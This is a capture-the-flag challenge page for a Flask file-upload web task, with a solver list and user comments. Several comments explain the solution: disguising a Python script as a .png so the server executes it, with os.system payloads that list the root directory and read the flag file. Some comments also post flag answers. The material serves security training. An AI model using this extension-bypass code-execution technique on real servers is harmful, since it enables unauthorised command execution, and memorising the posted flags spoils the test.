Flask_FileUploadWEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Lazzaro
一血奖励:
3金币
解 决:
12047
提 示:
描 述:
Flask_FileUpload
评分(20)
解题动态

ash0x 攻破了该题 2天前

kttsy 攻破了该题 2天前

peach.peach 攻破了该题 3天前

3268798994 攻破了该题 4天前

SweetSour 攻破了该题 5天前

qieding 攻破了该题 6天前

JEB_Bem 攻破了该题 6天前

forces 攻破了该题 6天前

294903544 攻破了该题 8天前

pezn1and 攻破了该题 8天前

smileblack 攻破了该题 8天前

17364302189 攻破了该题 9天前

ldy127bugku 攻破了该题 9天前

1720713439 攻破了该题 10天前

zjl182 攻破了该题 10天前

jiayouya 攻破了该题 11天前

不上早八 攻破了该题 11天前

kfdwty 攻破了该题 12天前

18897888104 攻破了该题 12天前

评论
HK1ng 26天前
举报
随便传一个jpg试一试,查看源码 发现提示会通过python执行,然后返回给我们,写个python脚本,看一下返回值,import os os.system('ls /') 然后看到根目录下有flag。cat读flag即可。
chaojiikun 4月前
举报
os.system()执行命令
Wang_Micro 5月前
举报
flag{bf686c3799aa1aa32c4c8b025bba84a7}
tkStar 8月前
举报
先看源码,只检查了后缀是png,上传包含系统命令的python文件,后缀改成png就行
2808476708 8月前
举报
flag{abe11096bb1215a2a5f8696f4ab98f1f}
yvonne 8月前
举报
import os 换行 os.system()
1uxu4y 8月前
举报
flag{a04e45c0960f5413e9847ea5d666d5d5}
18835508637 9月前
举报
flag{8b6840315d0d9b357abeb8cfe1dbeb5a}
tot1987 9月前
举报
新建txt,输入: import os os.system('ls /') 保存为a.png,然后上传,发现根目录下有个flag, 然后在修改txt内容为: import os os.system('cat /flag') 保存后,再上传,在新页面中查看源码,得到flag
Chibits 9月前
举报
import os os.chdir('..') print(os.listdir('.')) os.system('cat flag')